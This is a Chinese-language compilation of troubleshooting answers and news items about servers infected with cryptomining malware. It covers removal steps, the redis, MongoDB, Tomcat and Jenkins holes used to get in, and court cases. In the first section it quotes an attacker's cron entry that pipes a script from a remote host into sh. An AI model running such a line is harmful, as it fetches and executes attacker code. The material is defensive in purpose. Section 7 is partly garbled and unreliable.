伺服器植入挖礦程序

1. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

2. windows伺服器的挖礦進程怎麼關閉刪除

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後，使用裡面的病毒查殺功能，直接就可以查殺這種電腦病毒了

3. 伺服器被檢測出挖礦

有位朋友說，他伺服器使用的好好的，服務商突然封了他伺服器，說是被檢測出挖礦，這位朋友一臉懵「我開游戲的，挖什麼礦」。突然地關停伺服器導致這位朋友損失慘重，那麼為什麼會被檢測出挖礦，以及怎麼處理呢？感興趣的話就繼續往下看吧~

遇到以上問題，需要先找伺服器商對其說明實際情況，配合他們排查，基本上就是中了挖礦病毒。

最簡單的方法就是重裝系統，但是系統盤數據都會清空，這種辦法適用於伺服器里沒什麼需要備份的文件。如果選擇重裝系統，需要把自己的文件掃毒一遍確認安全後再導入伺服器。

但是伺服器里如果有很多重要的文件還有比較難配置的環境，那就需要排查刪除挖礦程序，全盤掃毒，刪除可疑文件，一個個修復病毒對系統的修改。

防範建議：

1.盡量不要使用默認密碼和埠，改一個比較復雜的密碼

2.可以使用寶塔面板登陸伺服器

3.系統自帶的防火牆、安全防護都不要關閉

4. 伺服器被攻擊並植入kdevtmpfsi挖礦/病毒/木馬

MongoDB庫中的數據莫名其妙沒有了，發覺如下信息：

1、 top -d 5命令 ，查看系統負載情況、是否有未知進程，發現一個名為kdevtmpfsi的進程，經科普它是一個挖礦程序，會佔用伺服器高額的CPU、內存資源。如圖，CPU佔用率高達788.7%，而且是yarn用戶下：

2、 ps -ef |grep kdevtmpfsi 命令查看 該挖礦程序路徑：/tmp/kdevtmpfsi

3、 ps -ef |grep yarn 命令查看更多關於yarn相關進程信息（此時我的伺服器並沒有開啟yarn服務，如果有yarn的相關進程則可判斷是攻擊者開啟的進程），發現另外還有個kinsing進程，經科普kinsing進程是kdevtmpfsi的守護進程：

4、 netstat -lntupaa 命令查看是否有異常的ip,果然發現194.87.102.77這個陌生的ip，判斷是kdevtmpfsi的發出者：

5、經查詢該ip的所在國家是俄羅斯：

6、 find / -iname kdevtmpfsi 命令再次確定命令所在位置以便刪除：

7、 cd /tmp 進入相關目錄：

8、 rm -rf kdevtmpfsi 刪除kdevtmpfsi程序：

9、** kill -9 40422**殺掉kdevtmpfsi進程：

10、發現並沒殺掉所有kdevtmpfsi進程，再次查找yarn的相關進程（因為之前已確認病毒是在yarn下），果真還有kdevtmpfsi進程存在：

11、用命令 批量殺掉 相關進程：

12、刪除kinsing文件：

13、現在，已經把挖礦程序及相關進程刪除掉了，但是還有兩處沒做處理：

14、 crontab -l 命令先看看crontab的定時任務列表吧：

15、編寫刪除挖礦程序腳本 kill_kdevtmpfsi.sh ：

16、新增 定時任務 並刪除攻擊者的挖礦定時任務：

17、 crontab -l命令 查看現在只有殺進程的定時任務了：

18、禁止黑客的IP地址。

最初安裝MongoDB時，並未設置密碼認證，存在漏洞，導致黑客通過漏洞攻擊伺服器，並在程序里植入木馬/病毒。單純的kill -9 id殺掉病毒進程是殺不徹底的，治標不治本，應該定時刪除病毒進程，禁止攻擊者IP，重新安裝系統或相關軟體。

經過幾天的觀察，伺服器運行正常，再沒有被黑客攻擊成功。

5. 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

6. 如何查看電腦是否被植入了挖礦程序

如何判斷自己的電腦是否被挖礦，怎樣預防？
電腦開機後，所有程序都不打開的情況下。按Ctrl+ALT+Del調出任務管理器，在「進程」卡項中，查看CPU的使用情況。如果看到某個進程佔用了大量的cpu使用情況，並且幾分鍾後都沒有降低的趨勢，這個程序就可能是病毒了。
想要預防自己的電腦被挖礦也很簡單，只要安裝正規的安全軟體，使用安全的瀏覽器，添加安全合適的插件，就可以防止電腦被挖礦了。
當然，如果不瀏覽不正規不健康的網站，不下載盜版游戲，盜版軟體等就更能從根源杜絕電腦被不法分子挖礦的風險。

7. 新買的雲伺服器提示挖礦

利用雲電腦的計算資源執行挖礦的持續性程序,
已停止是服務絕大數都是正常的。這些已停止表示你已經禁用或停止了相關的服務，但停止不是卸載，所以它們仍然存在是正常的，每台電腦里都有許多已停止的差念服務，不用擔心。你真正要擔心的是360那個提示，可在任務管理器中查著虛兄困活動進程，若某進程CPU或內存佔用高，而你又不明確該進程是塵肢幹嘛的，可以先結束進程再看看360還會不會提醒!

8. 電腦挖礦違法嗎

正常用著的電腦，卻被非法控制，替別人「幹活」，用戶卻渾然不知。原來，電腦被植入了挖礦程序及挖礦監控程序，監控程序只要監測到電腦CPU利用率低於50%，挖礦程序就會在後台靜默啟動，通過大量耗費被控電腦的CPU、GPU資源和電力資源，持續不斷地挖取虛擬貨幣，並將這些虛擬貨幣轉至控制者處，從而提現牟取暴利。
近期，濰坊市公安局網安支隊會同青州市公安局在公安部、省公安廳指導下，在騰訊守護者計劃安全團隊協助下，按照公安部和省公安廳「凈網2018專項行動」部署要求，成功破獲部督「1.03」特大非法控制計算機信息系統案，目前抓獲犯罪嫌疑人20名，取保候審11名，批捕9名。
經查，大連昇平網路科技有限公司研發挖礦監控軟體、集成挖礦程序後，通過發展下線代理，非法控制了全國389餘萬台電腦主機做廣告增值收益，在100多萬台電腦主機靜默安裝挖礦程序。兩年期間共挖取DGB幣（「極特幣」）、DCR幣（「德賽幣」）、SC（「雲產幣」）幣2600餘萬枚，共非法獲利1500餘萬元。
據了解，雖然非法控制計算機信息系統的違法犯罪屢見不鮮，但是數量達到如此之巨，而且通過植入靜默挖礦程序這種新型手段，進行虛擬貨幣變現，這在全國是比較少見的。

游戲外掛暗藏挖礦木馬程序
2018年1月3日，濰坊市公安局網安支隊接騰訊守護者計劃安全團隊報案稱，騰訊電腦管家檢測到一款游戲外掛暗藏了一款木馬程序，該木馬程序具備後台靜默挖礦功能。
「挖礦，就是通過大量計算機運算獲取數字貨幣-虛擬貨幣獎勵，這個過程對電腦硬體配置要求比較高，主機經常長期高負荷運轉，顯卡、主板、內存等硬體會提前報廢，對電腦的損害極大。」辦案民警介紹。
辦案民警說，違法犯罪人員通常提前調研市面上挖取難度較低的虛擬貨幣，通過雲計算、顯卡雲計算業務非法控制用戶的電腦主機，植入這種虛擬貨幣的挖礦程序進行挖礦，用戶對此毫無察覺，只要電腦處於開機狀態，挖礦程序就在後台靜默運轉，在挖取到大量礦幣後迅速轉至控制者那裡變現提現，牟取高額利潤。
初步統計，該木馬程序感染數十萬台用戶機器。濰坊市公安局網安支隊接案後，迅速研判案件線索，通過互聯網提取到外掛木馬樣本，找到木馬開發者建立的木馬交流群，初步落查發現該款木馬程序開發者在青州市。市局網安支隊將該案情通報青州市公安局，由市局網安支隊、青州市局成立專案組，對該案立案偵查。
專案組確定交流群群主身份為楊某寶。通過偵查發現，楊某寶一是建立了多個外掛討論群，在群文件中共享外掛程序；二是利用「天下網吧論壇」版主的身份，將上傳含有木馬的外掛程序到「天下網吧」論壇供網民下載；三是通過網路網盤進行分享下載。
3月8日，專案組制定了詳細的抓捕方案，在家中將楊某寶抓獲。

9. top cpu飆高,中了挖礦程序----解決方法

1.發現cpu異常,查看對應的進程信息

2.查看進程發現是挖礦進程在執行

3.確定是挖礦病毒,查看進程的執行文件鏈接到哪裡,發現是jenkins的工作目錄,最後結果發現是jenkins的漏洞導致自動創建CI計劃,進行啟動挖礦腳本

4.查看虛機密碼是否被破解登錄

5.查找挖礦文件

6.檢查定時任務腳本

jenkins CVE-2018-1999002 漏洞修復: https://paper.seebug.org/648/
jenkings漏洞利用: https://xz.aliyun.com/t/4756
CI安全隱患: https://www.jianshu.com/p/8939aaec5f25
jenkins漏洞描述地址: https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/

10. 蔚來員工利用公司伺服器挖礦，這一行為是否違法

蔚來員工利用職務之便，從2021年2月開始使用公司伺服器進行挖礦，從中獲取利益，這個行為明顯已經觸犯了我國的相關法律。

其實利用公司資源進行非法挖礦行為早有先例，在2018年1月到5月期間，網路一個運維員工就曾經在網路公司伺服器上安裝挖礦程序，通過公司的資源謀取暴利，之後將挖礦所得的虛擬貨幣賣出，從中獲得10萬元人民幣，後來，在網路公司的追查下，這名員工才被發現，並且因涉嫌非法控制計算機信息系統罪被判有期徒刑三年，並處罰金1.1萬元，扣押違法所得10萬元整。

而對於挖礦這個行為，國家是堅決打擊的，目前相關的省份也出台了相關的文件，表面上只是提高了挖礦公司的電費，實際上是為了讓從事挖礦的人員知難而退，因為電費一旦上漲，那麼相對應的挖礦成本也就增加了。

綜上所述，該蔚來員工利用職務之便進行挖礦行為，已經涉嫌非法控制計算機信息系統罪，所以，他極有可能會因為此罪名而被起訴。